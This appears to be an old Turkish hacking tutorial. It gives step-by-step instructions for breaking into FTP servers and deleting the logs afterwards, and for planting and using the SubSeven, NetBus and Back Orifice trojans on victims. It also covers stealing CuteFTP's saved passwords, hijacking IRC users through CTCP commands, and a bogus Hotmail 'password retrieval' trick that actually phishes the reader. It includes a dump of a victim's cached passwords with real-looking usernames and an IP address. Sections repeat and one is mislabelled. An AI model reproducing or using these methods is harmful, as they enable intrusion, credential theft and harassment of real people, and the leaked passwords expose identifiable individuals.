HACK BILGILERI
SERVER HACK
Internete baglandiktan sonra hemen dos komut istemine'e cikin...
Kurban yerine hackliyceginiz server'i yazin adamin serverini
filan bulmak icin internic.com a gidin search yapin sayfanin en
altinda yazar..
ftp kurban.com
server username sorcak entera basip gecin
server password sorcak entera basip bunuda gecin
ve sunu yazin
quote user ftp
sonra bunu
quote cwd ~root
son olarakta bunu
quote pass ftp
Sonra mutlaka log file ini silin cunku sizin girdiginizi
anlayabilirler..
Password dosyasi su dizinin icinde " /etc/passwd "
Eger yukardakileri yaptiysaniz ve server biraz eskiyse root
passwordunu alabilirsiniz, bilmeyenler icin soleyelim root
password en
yuksek seviyedeki passdir onunla herseyi yapabilirsiniz..
Not: Bu yontem yeni serverlarda calismiyor. Universitelerde filan
calisiyor..
LINUX SERVER HACK
Internete baglandiktan sonra hemen dos komut istemine'e cikin...
Kurban yerine hackliyceginiz server'i yazin adamin serverini
filan bulmak icin
internic.com a gidin search yapin sayfanin en altinda yazar.. ftp
kurban.com
server username sorcak entera basip gecin server password sorcak
entera basip
bunuda gecin ve sunu yazin quote user ftp sonra bunu quote cwd
~root son
olarakta bunu quote pass ftp Sonra mutlaka log file ini silin
cunku sizin girdiginizi
anlayabilirler.. Password dosyasi su dizinin icinde "
/etc/passwd " Eger
yukardakileri yaptiysaniz ve server biraz eskiyse root
passwordunu alabilirsiniz,
bilmeyenler icin soleyelim root password en yuksek seviyedeki
passdir onunla
herseyi yapabilirsiniz.. Not: Bu yontem yeni serverlarda
calismiyor. Universitelerde
filan calisiyor..
SUBSEVEN NEDIR.NASIL KULLANILIR
.
SubSeven'i uzaktan yonetim icin veya hacking programi olarak
kullanabilirsiniz. Zip dosyasinin icinde iki tane program var bi
tanesi server.exe bunu kurbanin bilgisayarinda calistirmalisiniz
netbustan filan girip upload edebilirisiniz. Sebseven.exe ise
esas program her seyi bu program sayesinde yapacaksiniz...
Nasil Çalisiyor:
Kullanimi basit bi trojan. Kurban bilgisayarda server.exeyi
calistiriyorsunuz, gostermelik bi hata mesaji belirecek [soyle:
error loading system resources]. bundan sonra program kendini
otomatik hardiske kuracak, ve windows her acildiginda oda
acilacak. SubSeven.exe anaprogram netbus gibi bi sey her seyi
bundan yapacaksiniz.
Özellikler:
+ Adama mesaj yollarsiniz, ve cevap verebilir
+ Browseri acip istediginiz siteye yonlendirirsiniz
+ Start butonunu saklar
+ Kullanicinin dektop goruntusunu alabilirsiniz..
+ Keyboard tuslari calismaz
+ Kurban'la chat yapabilirsiniz. Icq chat gibi bir programi var
her zaman ustte olucak yani hic bi zaman kucultemez. Chatlesirken
bi kac numara yapabilirsiniz. .Kurbanin yazdigi yer kaybolur
sadece sizin yazdiklarinizi gorur kendisi yazamaz. Chat'ide
kapatamaz ancak bilgisayari kapamak zorunda kalir..
+ Pc Speaker'i acip kapar.
+ Windowsu yeniden baslatir.
+ CD-ROM'u acip kapar
+ Mouse trail'i ekleyebilirsiniz.[Hani su mouse'un arkasindan
gelen bi ok daha varya o iste]
+ Server'a sifre koyabilirsiniz.
+ Acik olan pencerelrin listesini alabilirsiniz:
- Istediginiz pencereyi kapayabilirsiniz
- enable/disable yapabilirsiniz.Kurban pencereyi acamaz
- Pencereyi kapama tusunu iptal edebilirsiniz
+ Kurbanin bilgisyarindaki butun suruculerin listesini verir.
+ Monitoru acip/kapar.
+ Gorev cubugunu saklar.
+ Kullanicinin bilgisayari hakkinda daha detayli bilgi
alabilirsiniz.Windows version,
kullanici adi, sirket adi, ekran cozunurlugu gibin..
+ Server'in ismini deistirebilirsiniz
+ listen for all the pressed keys. you'll see all the keys
pressed by the
victim. useful to get passwords.
+ Ses kaydeder. Kac saniyelik ses kaydi istiyorsaniz
yaziyorsunuz. Ve kayit bittiginde
server size yolluyor. Tabii kullanicinin mikrofonu varsa..
+ Dosya Yoneticisi.Kurbanin bilgisyarindaki butun dosyalari
gorebilirsiniz. Bi klasore iki
kere tikladiginizda istediginizi yapabilirsiniz:
- dosyanin boyutunu gorebilirsiniz
- dosya download edebilirsiniz
- Bmp veya Jpg dosyasi ise wallpaper yapabilirsiniz.
- dosya silebilirsiniz
- Wav dosyalarini calabilirsiniz
- Istediginiz programi/trojani kullanicinin bilgisayarinda
calistirabilirsiniz.
+ Mouse tuslarinin yerlerini degistirir..Sola bastiginda sag sag
bastiginda sol tusun
gorevini yapar..
+ Kurban online olunca haber verir. Bunu E-mail serveri
kullanarak yapabilirsiniz, icqdan
kurban her online oldugunda size ip numarasini belirten bir mesaj
gelir.
+ Server'i kapar.Fakat kullanici bilgisayari bi daha actiginda
server yeniden acilir..
NETBUS SIFRELERINI KIRMAK....
1. Yöntem : Sitemden indirmis oldugunuz Netbushacker adli
program ile bunu yapmak çok kolay ustdeki bolume
kisinin ip numunu yaziyoruz sonra set ip diyoruz altdaki
"change pass" bolumunun silikligi gidene kadar
bekliyoruz sonra assagi tarafa yeni sifreyi yazip
giriyoruz.
2.)Yöntem Telnetle:
Telnet her windowsta var..Bul dan telnet'i bulup calistirin.
Baglana gelip uzaktaki sistem'e tiklayin
Ana bilgisyar adi: wingatede buldugmuz ipyi yazin
Baglanti Noktasi kismina ise 12345 yazin ve baglan in.
Sifreyi .ALMAK için
Password;1;123 ServerPwd;phiberoptik
Yapistirin.Sonra bir daha netbus'la girmeye çalisiyoruz sordugu
sifreye dephiberoptik yaziyoruz
CUTE FTP KULLANICILARIN
SIFFELERINI ÇALMAK....
Birisinin web sitesini hacklemek istiyorsunuz.. (TABI VARSA) bu
gibi konularda en önemli olay mantiktir.. Bu hack olayi için
karsi tarafin BOSERVE yada PATCH gibi yem programciklarini
çalistirmasi gerekir.. Bunu yaptigini farzedelim! Her FTP
programinin sifreleri kaydettigi bir DATA dosyasi vardir. Genelde
ençok kullanilan CUTEFTP dir. Bu ftp programi kaydedilen
sifreleri, SMDATA.DAT dosyasinda sakliyor.. Karsidaki kurbanin
SMDATA.DAT dosyasini aliniz.. Bunuda su yolu takip ederek
bulabilirsiniz.. Genelde :
/PROGRA~1/CUTEFTP/SMDATA.DAT dir. Bu dosyayi kendi cuteftp nizin
oldugu yere kopyalayin.. fakat bundan önce kendinizinkini
yedekleyinki sizin sifreler silinmesin.. Daha sonra bu dosyadan
sifreleri alin..
BILGISAYARA GIRME....
Telnet her windowsta
vardir...Bul (find) dan telnet'i buldurup calistirin... Baglana
gelip uzaktaki sistem'e tiklayin... Ana bilgisyar adi: wingatede
buldugumuz ip'i yaziyoruz. Baglanti Noktasi kismina ise netbus
portu olan 12345 yaziyoruz..baglana tikliyoruz.. yukarda netbus
1.6 veya 1.7 yazar.. Simdi sifreyi kirmak için Password;1;123
ServerPwd;onurbu yaziyi paste'liyoruz...ve sifre ufuk oluyor,siz
sifreyi ufuk yerine baska bir seylerde yapabilirsiniz..
Sonra bir daha netbus'a gidiyoruz artik sifre ufuk
giriyoruz...Artik adamin bilgisayarindayyz..file manager'a
gelerek adama boserve.exe yi yolluyoruz...nereye yolliycagimizi
soruyor.. c:\windows yazarak windowsun altina atiyoruz.
yolladiktan sonra download ewkranini kapiyoruz.. start program
diyoruz...c:\windows\boserve.exe diyoruz..tamam netbustaki
isimizde bitti..
Simdi Back Orifice'ye geçiyoruz.target host:porta adamin ipsini
yaziyoruz..yan tarafada 12345 yan taraftan system passwordsu seçip
send e basiyoruz ve bingoooo bu adimda 10un ustunde password
varmis.. Bo da dah cok sey yapabilirsiniz ama onlarida sonra
anlatirimmm.. bu arada adamdan cikan passler..
** 0:Ping host packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337
---------
!PONG!1.20!WINDOWS!
------------------------- End of Data -------------------
** 1:System passwords packet sent (19 bytes) val1: '' val2: ''
---------- Packet received from host 194.242.78.148 port 31337
---------
Password cached by system:
index:02(06) len:34(20/52)
Resource: 'crypt_Blizzard_Storm' Password: 'óåP'
index:09(19) len:52(41/22)
Resource: 'www.schoolgirls.com/restricted directory' Password:
':'
index:13(19) len:50(31/102)
Resource: 'www.sexxxfarm.com/members only' Password: 'burp:burp'
index:25(01) len:28(07/122)
Resource: 'WINDOWS' Password: 'PAKSOYKAROLAû'
index:00(06) len:74(53/122)
Resource: '*Rna\AT&T WorldNet
Service\100000000@worldnet.att.net' Password: 'aaaaaaaaaaaa'
index:04(06) len:68(50/92)
Resource: '*Rna\Microsoft Internet Referral Service\icwsignup'
Password: 'icwsignup9,'
index:07(06) len:44(27/82)
Resource: '*Rna\Turk Nokta Net\abaygan' Password: 'need-bob'
index:08(06) len:38(25/52)
Resource: '*Rna\Turk Nokta Net\burak' Password: 'burak'
index:10(06) len:22(14/02)
Resource: '*Rna\sol\amnyk' Password: '*'
index:05(06) len:42(27/72)
Resource: '*Rna\Turk Nokta Net\necatit' Password: 'eynesil"'
index:11(06) len:34(19/62)
Resource: '*Rna\Alnet\ersinari' Password: '987199$'
index:15(06) len:36(21/62)
Resource: '*Rna\Burak\rbayraktar' Password: '963963'
index:16(06) len:42(27/62)
Resource: '*Rna\Ba?lantym 5\rbayraktar' Password: '963963.$'
index:17(06) len:36(19/82)
Resource: '*Rna\Burak\r1056700' Password: 'DABmvsVG·('
index:18(06) len:40(19/122)
Resource: '*Rna\Burak\doganalp' Password:
'alpdogan<BR>ß'
index:19(06) len:18(10/02)
Resource: '*Rna\nolur' Password: '$'
index:20(06) len:36(19/82)
Resource: '*Rna\Burak\b1000025' Password: 'ncVCjYFu¬ '
index:06(06) len:32(16/82)
Resource: '*Rna\AYDATA\suen' Password: '68913672$'
index:22(06) len:36(22/62)
Resource: '*Rna\Ba?lantym 4\merko' Password: 'merko7.'
index:21(06) len:46(25/122)
Resource: '*Rna\Ba?lantym 7\ baycenk' Password: 'gizlikorkunc'
index:23(06) len:28(19/12)
Resource: '*Rna\bayrak\baycenk' Password: ' '
index:14(06) len:30(16/52)
Resource: '*Rna\Burak\burak' Password:
'burakì'
index:12(06) len:30(16/62)
Resource: '*Rna\Alnet\merko' Password: 'merko7&'
index:24(06) len:38(17/122)
Resource: '*Rna\cenk\baycenk' Password: 'paksoykarolaa'
index:01(04) len:18(05/52)
Resource: 'MAPI' Password:
'MAPI'
index:03(19) len:14(04/12)
Resource: 'NNTP' Password: ':'
End of cached passwords.
Unable to read value 'ScreenSave_Data'
HOTMAIL HACK....
1-Önce hotmailden bir hesap alin veya hesabiniz varsa
almana gerek yok.
2-Hotmail mailine girin.
3-Yeni bir mail yarat
4-Mailin Subject bölümüne "retrieve password" yaz
5-Gidecek adres
bölümüne:"mspport_recovery_bot@hotmail.com" yazi
6-Mesaj bölümüne asagidakileri yaz:
ARKADASININ LOGIN ADI(örnegin mail adresi sonkurban@hotmail.com
ise sonkurban yaz..)
/cgi-bin/start/v7.03/method=get:passmachine+SENINHOTMAILSIFREN{M27568&java-&rsa
Bu maili gönderdikten sonra sana "from:system
subject:system reg message" baslikli mail gelecek ve bu
mailde o kisinin hotmail sifresi olcak
SCRIPT YÖNETMEK ...
Dragon ve Solucan Script Kullanicilarini yönetmek.Yukarda ismi
yazili scriptleri kullanan masumca chatini yapan kisilere irc yi
zindan etmek artik çok basit.CTCP özelliklerini kullanarak en
basiti kurbanin nickini degistirmekten baslayan ve her türlü
mirc
komutunu kullanmanizi saglayan komutlari açikliyorum.
Nick Degistirme /ctcp nick LAGG /nick
yeni nick
Kanala Sokma /ctcp nikc LAGG /join #kanal
Kanala yazi yazdirma /ctcp nick LAGG /msg #kanal mesaj
Kurbani ircden çikarma /ctcp nick LAGG /quit (mesaj istenirse)
Kurbanin mIRC ini kapama /ctcp nick LAGG /exit
Sizinde gördügünüz gibi aslinda olay sadece /ctcp nick
LAGG den sonra yazdiginiz komutlarin kurban tarafindan
uygulanmasindan baska birsey degildir.
SERVER-COKERTME....
Internete baglandiktan sonra
hemen dos komut istemine'e cikin...
Kurban yerine hackliyceginiz server'i yazin adamin serverini
filan bulmak icin internic.com a gidin search yapin sayfanin en
altinda yazar..
ftp kurban.com
server username sorcak entera basip gecin
server password sorcak entera basip bunuda gecin
ve sunu yazin
quote user ftp
sonra bunu
quote cwd ~root
son olarakta bunu
quote pass ftp
Sonra mutlaka log file ini silin cunku sizin girdiginizi
anlayabilirler..
Password dosyasi su dizinin icinde " /etc/passwd "
Eger yukardakileri yaptiysaniz ve server biraz eskiyse root
passwordunu alabilirsiniz, bilmeyenler icin soleyelim root
password en yuksek seviyedeki passdir onunla herseyi
yapabilirsiniz..
Not: Bu yontem yeni serverlarda calismiyor. Universitelerde filan
calisiyor..
NOT: Yukaridaki Bilgiler Egitim Amaçlidir.